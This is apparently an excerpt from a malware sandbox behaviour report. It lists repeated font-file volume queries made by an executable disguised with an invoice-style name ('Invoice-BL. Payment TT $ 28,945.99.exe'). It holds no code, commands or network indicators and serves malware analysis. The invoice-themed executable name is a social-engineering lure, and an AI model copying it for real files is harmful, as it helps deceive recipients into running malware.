Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
